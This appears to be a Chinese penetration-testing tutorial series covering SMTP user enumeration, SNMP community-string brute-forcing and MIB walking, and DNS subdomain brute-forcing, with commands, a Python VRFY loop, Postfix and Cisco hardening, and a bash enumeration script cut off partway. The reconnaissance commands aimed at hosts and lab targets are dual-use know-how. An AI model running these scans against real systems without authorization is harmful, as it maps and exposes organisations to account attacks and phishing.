1. smtp-user-enum工具

 1# 基本语法
 2smtp-user-enum -M <模式> -u <用户字典> -t <目标IP> [选项]
 3
 4# 模式选择
 5-M VRFY # 使用VRFY命令（最常用）
 6-M EXPN # 使用EXPN命令（需服务器支持）
 7-M RCPT # 模拟邮件发送验证
 8
 9# 实战示例
10smtp-user-enum -M VRFY -u userlist.txt -t mail.example.com -p 5
11smtp-user-enum -M EXPN -D corporate.com -u employees.txt -t 10.10.1.50

关键参数：

-p：超时时间（秒）
-D：域名后缀（自动追加@domain.com）
-T：线程数（加速扫描）

2. Nmap扫描

1# 检测SMTP支持命令
2nmap -p25 --script smtp-commands 192.168.1.100
3
4# 自动化用户枚举
5nmap -p25 --script smtp-enum-users 192.168.1.100
6
7# 指定字典路径（默认使用nselib/data/usernames.lst）
8nmap -p25 --script smtp-enum-users --script-args userdb=custom_users.txt 192.168.1.100

四、安全风险与防护措施

1. 攻击风险矩阵

漏洞点	危害等级	利用场景
VRFY命令未禁用	⭐⭐⭐⭐⭐	直接获取有效用户列表
EXPN命令未禁用	⭐⭐⭐⭐	泄露邮件组和内部结构
RCPT TO无限制	⭐⭐⭐	隐蔽验证用户存在性
响应差异泄露	⭐⭐	通过响应时间/错误信息枚举

2. 防御加固方案

服务端配置（以Postfix为例）：

1# 禁用VRFY和EXPN命令
2disable_vrfy_command = yes
3smtpd_discard_ehlo_keywords = expn, vrfy
4
5# 统一响应（所有请求返回相同信息）
6smtpd_reject_unlisted_recipient = yes
7unknown_local_recipient_reject_code = 550

访问控制：
- 防火墙限制25端口访问源IP
- 启用STARTTLS强制加密通信
- 部署Fail2ban自动封禁扫描IP

监控与审计：

1# 实时监控SMTP日志（示例）
2tail -f /var/log/mail.log | grep 'VRFY\|EXPN\|RCPT'
3
4# 配置告警规则（超过10次验证请求触发警报）

五、进阶攻击技术

多级枚举：

 1# Python自动化脚本示例
 2import smtplib
 3users = ['admin','test','webmaster']
 4for user in users:
 5 try:
 6 smtp = smtplib.SMTP('mail.target.com', 25)
 7 status = smtp.vrfy(user)
 8 if status[0] == 250: 
 9 print(f"[+] Valid user: {user}")
10 except: pass

组合攻击路径：

graph LR
A[SMTP枚举] --> B[获取有效账户]
B --> C{账户用途}
C --> D[密码喷射攻击]
C --> E[钓鱼邮件制作]
C --> F[员工信息关联]

SNMP枚举

多年来，我们发现许多网络管理员对简单网络管理协议（SNMP）理解不足，这常导致配置错误，造成严重信息泄露。

SNMP基于无状态UDP协议，易受IP欺骗和重放攻击
常见版本（1/2/2c）无流量加密，敏感信息可在局域网被截获
默认使用弱认证方案（如公开的团体字符串"public"/“private”）

真实攻击案例

某次对网络集成公司的渗透测试中：

扫描发现包含数千台思科路由器的B类网络（客户网关）
一台低端ADSL路由器使用默认凭证cisco/cisco
其配置文件泄露了复杂的SNMP读写团体字符串（所有设备共用）
利用SNMP+TFTP脚本批量下载路由器配置：

→ 同时攻破该公司及其所有客户的基础设施

SNMP MIB树结构

管理信息库（MIB）以树形数据库组织网络信息：

分支：代表组织或网络功能
叶节点：存储具体变量值（可被外部访问）

示例（Windows SNMP参数）：

text

复制

1.3.6.1.4.1.77.1.2.25 // 用户账户 
1.3.6.1.2.1.25.4.2.1.2 // 运行进程 
1.3.6.1.2.1.6.13.1.3 // 开放TCP端口 
1.3.6.1.2.1.25.6.3.1.2 // 已安装软件

扫描与枚举工具

NMAP扫描

1nmap -sU --open -p161 192.168.1.0/24 # 检测开放161/UDP端口

onesixtyone爆破团体字符串

1# 创建IP列表(ips.txt)和团体字符串字典(communities.txt)
2onesixtyone -c communities.txt -i ips.txt

snmpwalk枚举信息

1snmpwalk -c public -v1 -t 10 10.11.1.14 # 遍历整个MIB树
2snmpwalk -c public -v1 10.11.1.14 1.3.6.1.4.1.77.1.2.25 # 枚举用户
3snmpwalk -c public -v1 10.11.1.73 1.3.6.1.2.1.25.4.2.1.2 # 枚举进程

snmp-check综合工具
```
1snmp-check -c public -v 1 10.11.1.50
```

练习任务

用onesixtyone扫描目标网络识别SNMP服务器
使用snmpwalk和snmp-check收集目标信息

核心知识点总结

1. 协议风险

漏洞类型	技术原因	后果
无加密通信	SNMPv1/2/2c明文传输	敏感信息被嗅探
弱认证机制	默认团体字符串(public/private)	未授权访问
配置错误	管理员忽视安全配置	网络拓扑/凭证大规模泄露

2. 攻击向量

信息侦察：通过MIB树提取系统/用户/网络信息
权限升级：写入配置（需私有团体字符串）→ 完全控制设备
横向渗透：攻陷集中管理节点 → 控制所有关联设备

3. 关键工具链

graph LR
A[扫描] --> B(onesixtyone爆破团体字符串)
A --> C(NMAP探测端口)
B --> D[获取有效凭证]
D --> E[snmpwalk枚举MIB数据]
D --> F[snmp-check自动化收集]
E --> G[提取用户/进程/端口信息]

4. 防御策略

协议升级：强制使用SNMPv3（支持AES加密+强认证）

访问控制：

1# 仅允许可信IP访问（Cisco示例）
2snmp-server community ENCRYPTED-STRING RO 10 
3snmp-server permit 192.168.1.0 0.0.0.255

安全加固：
- 禁用默认团体字符串
- 限制MIB树访问权限
- 配置防火墙过滤UDP/161端口

5. 渗透测试要点

优先扫描目标：路由器/交换机/打印机等网络设备
组合利用：

SNMP泄露凭证 → 登录设备 → 获取更多敏感配置
自动化脚本：

结合SNMP+TFTP实现批量化配置下载

💡 案例启示：共享凭证配置的“便利性”可能造成供应链级灾难，需实施分布式密钥管理。

附：MIB树关键分支速查表

OID节点	信息类型
1.3.6.1.2.1.1	系统基本信息
1.3.6.1.2.1.25.1.6	存储设备
1.3.6.1.2.1.6.13.1.3	开放TCP端口
1.3.6.1.2.1.25.4.2.1.2	运行进程列表
1.3.6.1.4.1.77.1.2.25	用户账户

注意！SNMP不是SMTP

SMTP（Simple Mail Transfer Protocol）和SNMP（Simple Network Management Protocol）确实容易混淆，两者都是网络协议但功能、用途和技术实现完全不同。以下是清晰对比：

核心区别表

维度	SMTP（邮件传输协议）	SNMP（网络管理协议）
核心功能	发送电子邮件	监控和管理网络设备（路由器/交换机等）
工作层级	应用层协议	应用层协议
传输协议	TCP（可靠连接）	UDP（无连接，速度快）
默认端口	25（明文）/ 587（加密）	161（Agent）/ 162（Trap）
核心操作	`MAIL FROM`, `RCPT TO`, `DATA`发送邮件内容	`GET`（读数据）, `SET`（写配置）
安全风险	用户枚举（VRFY/EXPN命令）、钓鱼邮件	信息泄露（MIB树）、设备配置被篡改
典型使用场景	邮件服务器（如Exchange, Postfix）	网络设备（路由器、防火墙、打印机等）

详细区分指南

1. 用途：邮件 vs 网管

SMTP = 邮局系统
- 只做一件事：把邮件从A点传输到B点（如 user@a.com→ user@b.com）
- 不存储邮件，不管理设备（类似现实中的邮递员，只负责运送信件）
SNMP = 设备监控系统
- 收集设备状态：CPU利用率、内存占用、端口状态（如路由器流量异常）
- 远程修改配置：重启接口、调整阈值（类似设备的远程控制面板）

2. 技术本质区别

特性	SMTP	SNMP
数据内容	邮件正文（文本/附件）	设备性能数据（数字/状态）
交互模式	客户端→服务器（单向发送）	管理器←→代理（双向读写）
关键漏洞	用户枚举（验证邮箱是否存在）	团体字符串泄露（默认public）
攻击工具	`smtp-user-enum`, `swaks`	`snmpwalk`, `onesixtyone`

3. 实际渗透测试中的区分

当你看到25/587端口开放：

→ 这是邮件服务器 → 尝试 SMTP枚举命令：

1telnet 10.1.1.10 25
2VRFY root # 检测用户"root"是否存在
3EXPN admins # 尝试展开邮件组

当你看到161/162端口开放：

→ 这是网络设备/服务器 → 尝试 SNMP信息收集：

1snmpwalk -c public -v1 10.1.1.20 # 遍历MIB树
2snmp-check -c private 10.1.1.20 # 自动提取设备信息

常见混淆点澄清

❌ 误区：”SNMP也可以传输数据，所以类似SMTP？“

→ 更正：SNMP传输的是设备状态数据（如温度值90°C），SMTP传输的是用户生成的邮件内容。
❌ 误区：”两者都用字符串认证（如SMTP密码 vs SNMP团体名），所以是一类协议？“

→ 更正：SMTP认证用于邮件发送权限，SNMP团体字符串用于设备管理权限（后者常导致严重配置泄露）

记忆口诀

📌 “邮差SMTP送信忙，网管SNMP查设备”

SMTP → 联想 信封/邮件（S for Send Mail）

SNMP → 联想 网络设备（S for System/Network Management）

下次实战：扫描到161端口？立刻反应：这是SNMP协议 → 尝试爆破团体字符串 → 用snmpwalk查设备信息。完全不同的攻击路径！

🔔 想要获取更多网络安全与编程技术干货？

关注 泷羽Sec-静安 公众号，与你一起探索前沿技术，分享实用的学习资源与工具。我们专注于深入分析，拒绝浮躁，只做最实用的技术分享！💻

扫描下方二维码，马上加入我们，共同成长！🌟

👉 长按或扫描二维码关注公众号

或者直接回复文章中的关键词，获取更多技术资料与书单推荐！📚

Day18 Kali主动信息收集DNS

Sun, 06 Jul 2025 23:45:46 +0000

关注泷羽Sec和泷羽Sec-静安公众号，这里会定期更新与 OSCP、渗透测试等相关的最新文章，帮助你理解网络安全领域的最新动态。后台回复“OSCP配套工具”获取本文的工具

DNS枚举

DNS枚举在主动信息收集（尤其是渗透测试或红队行动初期）中扮演着核心角色，它的核心价值在于揭示目标组织面向互联网的域名基础设施和相关系统的细节，从而勾勒出初步的攻击面。

发现子域名：
- 这是最重要的目的之一。主域名（如example.com）可能只暴露少量服务，但大量内部开发、测试、特定部门或业务线使用的系统往往部署在子域名下（如admin.example.com, dev.example.com, vpn.example.com, api.example.com）。
- 枚举这些子域名能显著扩大已知的攻击面，揭示隐藏的、可能安全性较弱的入口点。
识别关联的主机和服务：
- 通过查询A记录和AAAA记录，DNS枚举能将域名和子域名映射到具体的IPv4和IPv6地址。这直接揭示了目标实际运行网络服务的计算机位置（主机）。
- 知道主机IP是后续扫描（端口扫描、服务识别）和潜在攻击的起点。
发现电子邮件服务器：
- 通过查询MX记录，可以确定目标组织用于接收电子邮件的邮件服务器及其优先级。这是针对邮件系统进行渗透测试或发起鱼叉式钓鱼攻击的重要信息。
定位关键网络基础设施：
- 名称服务器记录：通过查询NS记录，确定该域名由哪些权威DNS服务器负责解析。攻击这些服务器或其配置弱点可能导致DNS劫持或拒绝服务。
- 邮件服务器信息：MX记录（如上所述）。
- 反向代理/CDN后端源站：有时CNAME记录可能指向CDN提供商的域名（如assets.example.com CNAME assets.customer-cdn.net），但也可能指向内部的负载均衡器或实际的应用服务器。
查找别名和重定向：
- CNAME记录将一个域名或子域名别名到另一个规范的域名。这有助于理解：
  - 基础设施架构（例如，某个子域名实际指向另一个服务器上的服务）。
  - 是否使用了第三方服务（例如，CNAME到AWS S3桶或第三方CMS）。
  - 可能指向内部系统（如果配置错误或暴露）。
探测安全配置信息：
- TXT记录：
  - SPF记录：用于防止邮件欺骗，包含允许发送该域名邮件的服务器IP地址或主机名列表。这可以直接泄露邮件服务器的IP范围。
  - DKIM记录：提供邮件签名公钥，用于验证邮件完整性。
  - DMARC记录：指定如何处理不符合SPF/DKIM的邮件的策略。
  - 意外信息：有时管理员会在TXT记录中留下注释、内部服务器名称、验证码（用于验证域名所有权，可能被滥用）甚至凭据（严重错误）。
- 暴露的服务器类型/版本：有时SRV记录（指向特定服务的位置，如_ldap._tcp.example.com）或CNAME可以暗示底层运行的服务器类型（如Windows域控制器）。
收集组织的网络边界信息：
- 通过获取所有与目标主域名及其子域名相关的A、AAAA记录，实际上是在映射目标组织在公网上拥有和控制的IP地址块。这对于理解他们的整体网络规模、可能的AS编号以及后续的网络层扫描（如端口扫描整个IP段）至关重要。
构建目标组织的数字资产清单：
- DNS枚举结果是构建目标组织完整互联网资产清单的基础。它列出了所有已知的、面向互联网的域名和对应的主机/IP地址。

为什么DNS枚举如此重要？

非侵入性（相对而言）： 标准的DNS查询（非区域传输）通常被认为是良性的、合法的互联网流量，难以被检测为恶意行为。它是一个相对隐蔽的起点。
信息价值高： 收集到的信息对于规划后续攻击步骤（下一步扫描哪个IP/端口，攻击哪个子域，如何伪造邮件）具有极高的指导价值。
易被忽略的安全点： 许多组织在子域名、废弃域名或DNS记录配置上存在疏忽（如暴露内部服务器名或IP），DNS枚举是发现这些弱点的有效方法。
攻击面扩展的核心： 未发现的子域名或IP地址意味着未评估的安全风险。DNS枚举确保在深入了解具体漏洞前，尽可能全面地掌握目标暴露在外的入口点。

DNS记录类型详解

ns - 包含载域DNS记录得授权服务器的名称
A- 包含主机名的IP地址
MX - 包含负责处理该域电子邮件的服务器名称，可以有多个MX记录
PTR 别名记录（反向区域使用）
CNAME - 别名记录，指向其他主机记录
TXT - 文本记录，可包含任意数据，常用于域所有权验证

NS (Name Server) 记录：
- 含义： 这是最基础、最关键的记录之一。它指定了哪些 DNS 服务器是某个特定域（比如 example.com）的权威服务器。权威服务器存储着该域所有 DNS 记录的官方、最终版本。
- 作用： 当你的电脑或其他解析器需要查询 example.com 或其子域（如 www.example.com）的信息时，它首先会查找根 DNS 服务器，然后根据 .com 的顶级域服务器指引，最终找到 example.com 的 NS 记录指向的服务器。这些服务器才能提供 example.com 域下所有记录的准确答案（如 A、MX、CNAME 等）。
- 重要性： 没有正确的 NS 记录，整个域的 DNS 解析就无法正常工作。攻击者常通过 NS 记录来定位目标组织的权威 DNS 服务器，这些服务器本身也可能是攻击目标。
- 示例： example.com. IN NS ns1.provider.com. example.com. IN NS ns2.provider.com.
A (Address) 记录：
- 含义： 这是最常用的记录类型。它将一个主机名（域名或子域名）直接映射到一个 IPv4 地址。
- 作用： 当你在浏览器输入 www.example.com 时，DNS 系统最终会查找该主机名的 A 记录，获得其对应的 IP 地址（如 93.184.216.34），然后你的浏览器才能连接到该 IP 地址的服务器获取网页内容。它负责将“人类可读”的名字转换成机器使用的 IP 地址。
- 示例： www.example.com. IN A 93.184.216.34
AAAA (Quad-A) 记录：
- 含义： 功能与 A 记录完全相同，但它映射的是 IPv6 地址。
- 作用： 随着 IPv4 地址耗尽，IPv6 越来越重要。AAAA 记录让主机名能够解析到 IPv6 地址。
- 示例： www.example.com. IN AAAA 2606:2800:220:1:248:1893:25c8:1946
MX (Mail eXchange) 记录：
- 含义： 指定负责接收发送到该域（不是特定主机名）的电子邮件的邮件服务器。
- 特点：
  - 指向的是主机名（通常有对应的 A/AAAA 记录），而不是直接指向 IP 地址。
  - 可以有多个 MX 记录，每个记录有一个优先级值（数字越小，优先级越高）。发送邮件的服务器会先尝试连接优先级最高的邮件服务器，如果失败，再尝试优先级较低的。
- 作用： 确保发送到 user@example.com 的邮件能被正确路由到处理 example.com 邮件的服务器上。
- 示例： example.com. IN MX 10 mailserver1.example.com. example.com. IN MX 20 mailserver2.example.com.
PTR (Pointer) 记录：
- 含义： 用于反向 DNS 查找。它将一个 IP 地址映射回一个主机名。
- 作用：与 A/AAAA 记录相反。主要用于：
  - 日志记录： 在系统日志中显示 IP 地址对应的主机名，更易读。
  - 网络诊断： traceroute, ping 等工具有时会尝试反向解析 IP 地址。
  - 安全验证： 一些邮件服务器会检查发送方 IP 的反向解析记录是否与声称的发件域匹配（作为反垃圾邮件措施的一部分，但效果有限）。
  - 系统管理： 识别网络上的设备。
- 存储位置： PTR 记录存储在特殊的 DNS 域中，通常是 in-addr.arpa (IPv4) 或 ip6.arpa (IPv6)。
- 示例： 34.216.184.93.in-addr.arpa. IN PTR www.example.com. (这是 93.184.216.34 的反向记录)
CNAME (Canonical Name) 记录：
- 含义： 为一个主机名设置一个别名。它指向的是另一个主机名（称为规范名或真实名），而不是直接指向 IP 地址。
- 作用：
  - 简化管理： 例如，你可以让 www.example.com 作为 webserver-prod-lb-01.example.com 的别名。如果真实服务器的 IP 地址变了，你只需要更新 webserver-prod-lb-01.example.com 的 A 记录，所有指向它的 CNAME 会自动生效。
  - 指向外部服务： 例如，files.example.com 的 CNAME 可能指向某个云存储服务商提供的域名（如 example.bucket.s3.amazonaws.com）。
- 重要规则：
  - CNAME 记录不能与其他记录类型（如 MX, TXT, NS）共存于同一个主机名下。例如，example.com 不能同时有 CNAME 记录和 MX 记录。
  - CNAME 应该指向一个有效的、最终会解析到 A 或 AAAA 记录的主机名。
- 示例： www.example.com. IN CNAME webserver-prod-lb-01.example.com.
TXT (Text) 记录：
- 含义： 允许域管理员在 DNS 中存储任意文本信息。
- 用途广泛：
  - SPF (Sender Policy Framework)： 指定哪些邮件服务器被授权代表该域发送邮件（格式如 v=spf1 include:_spf.google.com ~all）。用于反垃圾邮件。
  - DKIM (DomainKeys Identified Mail)： 存储用于验证邮件签名的公钥（格式如 v=DKIM1; k=rsa; p=MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQC...）。
  - DMARC (Domain-based Message Authentication, Reporting & Conformance)： 定义如何处理未通过 SPF 或 DKIM 检查的邮件，以及发送报告的位置（格式如 v=DMARC1; p=reject; rua=mailto:dmarc-reports@example.com）。
  - 域所有权验证： 许多在线服务（如 Google Workspace, SSL 证书颁发机构）会让你在域名的 TXT 记录中添加一段特定文本（如 google-site-verification=abcdefg123456）来证明你拥有该域。
  - 其他信息： 有时会包含联系人信息、策略声明或其他任意备注（但应避免存储敏感信息）。
- 示例： example.com. IN TXT "v=spf1 include:_spf.google.com ~all" _dmarc.example.com. IN TXT "v=DMARC1; p=none; rua=mailto:dmarc-reports@example.com"

其他重要的 DNS 记录类型：

SOA (Start of Authority) 记录：
- 含义： 每个 DNS 区域文件必须包含且只能包含一个 SOA 记录。它包含关于该 DNS 区域的管理信息。
- 包含内容： 主要名称服务器 (MNAME)、区域负责人的邮箱 (RNAME - 注意格式，如 admin.example.com 实际是 admin.example.com，第一个点通常写作 admin\.example.com)、区域序列号 (SERIAL - 每次修改区域文件需递增此号)、刷新间隔 (REFRESH)、重试间隔 (RETRY)、过期时间 (EXPIRE)、负缓存 TTL (MINIMUM)。
- 作用： 用于区域传输（从主服务器同步到从服务器）和缓存管理。序列号是判断区域文件是否更新的关键。
SRV (Service) 记录：
- 含义： 指定提供特定服务（如 LDAP, SIP, XMPP）的服务器的主机名和端口号。
- 格式：
```
_Service._Proto.Name TTL Class SRV Priority Weight Port Target
```
  - _Service：服务名称（如 _ldap, _sip）。
  - _Proto：协议（通常是 _tcp 或 _udp）。
  - Name：该记录所适用的域名。
  - Priority：类似 MX 记录的优先级。
  - Weight：在相同优先级下用于负载均衡的权重。
  - Port：服务运行的端口号。
  - Target：提供该服务的主机名（需有 A/AAAA 记录）。
- 作用： 使客户端能够自动发现特定服务的服务器位置（哪个主机、哪个端口）。
- 示例： _sip._tcp.example.com. IN SRV 10 60 5060 sipserver.example.com.

在 Kali Linux 中查询 DNS 记录的工具

Kali Linux 自带了许多强大的网络工具，查询 DNS 记录主要使用 dig 和 nslookup，有时也会用到 host。

dig (Domain Information Groper)：
- 最强大、最灵活、最推荐的工具。 提供详细输出，非常适合调试和理解 DNS 响应。
- 基本语法：
```
dig [@server] [domain] [record_type]
```
  - @server：可选，指定查询哪个 DNS 服务器（如 @8.8.8.8）。不指定则使用系统默认 DNS。
  - domain：要查询的域名或主机名。
  - record_type：要查询的记录类型（如 A, AAAA, MX, NS, TXT, CNAME, SOA, PTR, SRV）。不指定默认为 A。
- 常用选项：
  - +short：只显示最精简的结果（通常就是记录值）。
  - +noall +answer：只显示查询的答案部分（最常用）。
- 查询示例：
  - 查询 example.com 的 A 记录：dig example.com A 或 dig +short example.com A
  - 查询 example.com 的 MX 记录：dig example.com MX +noall +answer
  - 查询 example.com 的 NS 记录：dig example.com NS
  - 查询 example.com 的 TXT 记录（常用于看 SPF/DKIM/DMARC）：dig example.com TXT
  - 查询 www.example.com 的 CNAME 记录：dig www.example.com CNAME
  - 查询 example.com 的 SOA 记录：dig example.com SOA
  - 查询 PTR 记录（反向解析 93.184.216.34）：dig -x 93.184.216.34
  - 查询 SRV 记录（如 SIP TCP 服务）：dig _sip._tcp.example.com SRV
nslookup：
- 交互式命令行工具， 也支持非交互模式。功能不如 dig 强大，但更简单直观。
- 基本语法（非交互）：
```
nslookup [-type=record_type] [domain] [server]
```
  - -type=record_type：指定记录类型（如 a, aaaa, mx, ns, txt, cname, soa, ptr）。
  - domain：要查询的域名或主机名。
  - server：可选，指定查询哪个 DNS 服务器。
- 交互模式：直接输入
```
nslookup
```
  ，然后按提示输入命令：
  - server 8.8.8.8：设置默认查询服务器。
  - set type=mx：设置查询的记录类型。
  - example.com：执行查询。
  - exit：退出。
- 查询示例：
  - 查询 example.com 的 A 记录：nslookup example.com
  - 查询 example.com 的 MX 记录：nslookup -type=mx example.com
  - 查询 example.com 的 TXT 记录：nslookup -type=txt example.com
  - 查询 PTR 记录：nslookup 93.184.216.34

host：

简单易用的工具， 输出比 dig +short 稍详细一点，但不如 dig 完整。

基本语法：

host [-t record_type] [domain] [server]
└─$ host -v
Usage: host [-aCdilrTvVw] [-c class] [-N ndots] [-t type] [-W time]
 [-R number] [-m flag] [-p port] hostname [server]
 -a is equivalent to -v -t ANY
 -A is like -a but omits RRSIG, NSEC, NSEC3
 -c specifies query class for non-IN data
 -C compares SOA records on authoritative nameservers
 -d is equivalent to -v
 -l lists all hosts in a domain, using AXFR
 -m set memory debugging flag (trace|record|usage)
 -N changes the number of dots allowed before root lookup is done
 -p specifies the port on the server to query
 -r disables recursive processing
 -R specifies number of retries for UDP packets
 -s a SERVFAIL response should stop query
 -t specifies the query type
 -T enables TCP/IP mode
 -U enables UDP mode
 -v enables verbose output
 -V print version number and exit
 -w specifies to wait forever for a reply
 -W specifies how long to wait for a reply
 -4 use IPv4 query transport only
 -6 use IPv6 query transport only
用法：host [-aCdilrTvVw][-c 类别][-N 点数][-t 类型][-W 时间]
[-R 次数][-m 标志][-p 端口]主机名 [服务器]
-a 等同于 -v -t ANY
-A 类似 -a 但不包含 RRSIG、NSEC、NSEC3
-c 指定非 IN 数据的查询类别
-C 比较权威名称服务器上的 SOA 记录
-d 等同于 -v
-l 列出域中的所有主机，使用 AXFR
-m 设置内存调试标志（跟踪记录|使用情况）
N 更改在执行根查找前允许的点数
-p 指定要查询的服务器端口
-r 禁用递归处理
-R 指定 UDP 数据包的重试次数
-s SERVFAIL 响应应停止查询
-t 指定查询类型
-T 启用 TCP/IP 模式
-U 启用 UDP 模式
-v 启用详细输出
-V 打印版本号并退出
-w 指定无限期等待回复
-W 指定等待回复的时间
-4 仅使用 IPv4 查询传输
-6 仅使用 IPv6 查询传输

-t record_type：指定记录类型（如 a, aaaa, mx, ns, txt, cname, soa, ptr）。
domain：要查询的域名或主机名。
server：可选，指定查询哪个 DNS 服务器。

查询示例：
- 查询 example.com 的 A 记录：host example.com
- 查询 example.com 的 MX 记录：host -t mx example.com
- 查询 example.com 的 TXT 记录：host -t txt example.com
- 查询 PTR 记录：host 93.184.216.34

1host www.megacorpone.com 
2host -t mx megacorpone.com
3host -t txt megacorpone.com
4host -t ns megacorpone.com
5host -C megacorpone.com # 比较所有权威DNS服务器的 SOA 序列号

反查IP对应的域名

总结：

dig 是专业首选，信息最全，功能最强。
nslookup 交互模式适合简单探索。
host 适合快速获取简洁结果。

当然，DNS查询也可以通过一些在线网站查询。

正向子域名爆破

写一个列表，用循环来实现爆破

1cat > list.txt
2www
3ftp
4mail
5owa
6proxy
7router
8# 回车后按ctrl D 结束保存
9for ip in $(cat list.txt); do host $ip.megacorpone.com; done

使用AI帮助我们改进一下这个命令就是：

1while IFS= read -r subdomain; do 
2 host "$subdomain.megacorpone.com" 2>&1 | grep -v -e 'not found' -e '^$'
3done < list.txt

如果只想要IP就是

1while IFS= read -r subdomain; do 
2 host -t A "$subdomain.megacorpone.com" 2>/dev/null | awk '/has address/ {print $4}'
3done < list.txt

想要更全的子域名大字典可以用

1sudo apt install seclists

安装后在 /usr/share/seclists目录下找到更多子域名列表来爆破，在Github上也能找到更多更强大的字典来爆破，日常渗透过程中也可以注意收集目标常用的信息来自制字典。

字典越强大，扫的东西越多。

Similar Projects

Assetnote Wordlists: High quality wordlists for content and subdomain discovery which are automatically updated every month.
fuzz.txt: Wordlists of “potentially dangerous” files.
FuzzDB: Dictionary of attack patterns and primitives for black-box application fault injection and resource discovery.
PayloadsAllTheThings: A list of useful payloads and bypass for Web Application Security and Pentest/CTF
BiblePass: Wordlists compiled from Bible verses
SamLists: Data-driven wordlists containing HTTP parameter names, directory names and filenames.

Wordlist Tools

Cook: A wordlist framework. An overpowered wordlist generator, splitter, merger, finder and saver. Cook facilitates the creation of permutations and combinations with a variety of encodings and many more features.
Wl: CLI utility for converting strings to a given casing style.
CeWL: Custom Word List generator.

用AI帮我们把工具加强一下。

 1#!/bin/bash
 2
 3# 脚本名称: subdomainfind.sh
 4# 功能: 子域名枚举工具，支持原始输出、格式化表格和CSV导出
 5# 用法: ./subdomainfind.sh 域名 [-w 字典文件] [-o 输出文件]
 6
 7# 错误处理函数
 8die() {
 9 echo "错误: $1" >&2
 10 echo "用法: $0 域名 [-w 字典文件] [-o 输出文件]"
 11 exit 1
 12}
 13
 14# 检查参数
 15if [ $# -eq 0 ]; then
 16 die "缺少域名参数"
 17fi
 18
 19DOMAIN="$1"
 20DEFAULT_WORDLIST="/usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt"
 21WORDLIST=""
 22OUTPUT_FILE=""
 23CSV_OUTPUT=""
 24
 25# 处理参数
 26shift
 27while [ $# -gt 0 ]; do
 28 case "$1" in
 29 -w)
 30 shift
 31 WORDLIST="$1"
 32 if [ -z "$WORDLIST" ]; then
 33 die "-w 需要指定字典文件"
 34 fi
 35 if [ ! -f "$WORDLIST" ]; then
 36 die "字典文件不存在: $WORDLIST"
 37 fi
 38 ;;
 39 -o)
 40 shift
 41 OUTPUT_FILE="$1"
 42 if [ -z "$OUTPUT_FILE" ]; then
 43 die "-o 需要指定输出文件名"
 44 fi
 45 CSV_OUTPUT="${OUTPUT_FILE%.csv}.csv"
 46 ;;
 47 *)
 48 die "未知参数: $1"
 49 ;;
 50 esac
 51 shift
 52done
 53
 54# 设置默认字典
 55if [ -z "$WORDLIST" ]; then
 56 WORDLIST="$DEFAULT_WORDLIST"
 57 if [ ! -f "$DEFAULT_WORDLIST" ]; then
 58 die "默认字典不存在: $DEFAULT_WORDLIST"
 59 fi
 60 echo "使用默认字典: $WORDLIST"
 61fi
 62
 63# 设置默认输出文件
 64if [ -z "$CSV_OUTPUT" ]; then
 65 SAFE_DOMAIN=$(echo "$DOMAIN" | tr -cd '[:alnum:]._-')
 66 CSV_OUTPUT="${SAFE_DOMAIN}.csv"
 67fi
 68
 69# 创建临时文件存储结果
 70RESULT_FILE=$(mktemp)
 71
 72# 获取字典行数
 73TOTAL=$(wc -l < "$WORDLIST" 2>/dev/null || die "无法读取字典文件")
 74
 75# 开始扫描
 76echo "============================="
 77echo "开始子域名枚举扫描"
 78echo "目标域名: $DOMAIN"
 79echo "使用字典: $WORDLIST"
 80echo "扫描数量: $TOTAL"
 81echo "开始时间: $(date)"
 82echo "CSV输出文件: $CSV_OUTPUT"
 83echo "============================="
 84echo
 85
 86START_TIME=$(date +%s)
 87COUNT=0
 88FOUND=0
 89
 90# 初始化CSV文件
 91echo "子域名,IP地址" > "$CSV_OUTPUT"
 92
 93# 主扫描循环
 94while IFS= read -r subdomain; do 
 95 # 进度统计
 96 ((COUNT++))
 97 
 98 # 计算时间和进度
 99 CURRENT_TIME=$(date +%s)
100 ELAPSED_SEC=$((CURRENT_TIME - START_TIME))
101 if [ $COUNT -gt 0 ]; then
102 AVG_TIME_PER_REC=$((ELAPSED_SEC / COUNT))
103 REMAINING=$((TOTAL - COUNT))
104 ESTIMATED_REMAINING_SEC=$((AVG_TIME_PER_REC * REMAINING))
105 MINS_REMAINING=$((ESTIMATED_REMAINING_SEC / 60))
106 SECS_REMAINING=$((ESTIMATED_REMAINING_SEC % 60))
107 fi
108 
109 # 计算进度百分比
110 PERCENT=$((COUNT * 100 / TOTAL))
111 
112 # 创建简洁的当前查询显示 (最多显示前20个字符)
113 current_query="${subdomain}.$DOMAIN"
114 display_query="${current_query:0:20}"
115 if [ ${#current_query} -gt 20 ]; then
116 display_query="${display_query}..."
117 fi
118 
119 # 创建进度条
120 bar=""
121 for ((i=0; i<50; i++)); do
122 if [ $i -lt $((PERCENT / 2)) ]; then
123 bar="${bar}#"
124 else
125 bar="${bar}."
126 fi
127 done
128 
129 # 显示进度信息
130 printf "进度: [%-50s] %3d%% | %d/%d | 时间: %02d:%02d | ETA: %02d:%02d | 当前: %s\r" \
131 "$bar" $PERCENT $COUNT $TOTAL \
132 $((ELAPSED_SEC / 60)) $((ELAPSED_SEC % 60)) \
133 $MINS_REMAINING $SECS_REMAINING \
134 "$display_query"
135 
136 # 执行DNS查询
137 result=$(host -t A "${subdomain}.$DOMAIN" 2>/dev/null)
138 
139 # 处理结果
140 if [[ "$result" == *"has address"* ]]; then
141 ((FOUND++))
142 
143 # 1. 输出原始格式结果
144 echo "$result"
145 
146 # 2. 保存结果用于表格
147 echo "$result" | grep -oE '[^ ]+ has address [0-9.]+' >> "$RESULT_FILE"
148 
149 # 3. 添加到CSV文件
150 echo "$result" | awk '/has address/ {print $1 "," $4}' >> "$CSV_OUTPUT"
151 fi
152 
153done < "$WORDLIST"
154
155# 清除进度行
156printf "\n\n"
157
158# 计算总耗时
159END_TIME=$(date +%s)
160TOTAL_TIME=$((END_TIME - START_TIME))
161
162# 显示表格总结
163if [ -s "$RESULT_FILE" ]; then
164 echo "============================="
165 echo "扫描结果汇总 (活动子域名)"
166 echo "============================="
167 echo
168 
169 # 确保表格对齐（包含标题长度）
170 max_sub_len=9 # "Subdomain" 标题长度
171 max_ip_len=10 # "IP Address" 标题长度
172 
173 # 读取结果计算最大长度
174 while IFS= read -r line; do
175 subdomain=$(echo "$line" | awk '{print $1}')
176 ip=$(echo "$line" | awk '{print $4}')
177 
178 # 处理超长字段
179 subdomain=${subdomain:0:60}
180 ip=${ip:0:15}
181 
182 if [ ${#subdomain} -gt $max_sub_len ]; then
183 max_sub_len=${#subdomain}
184 fi
185 
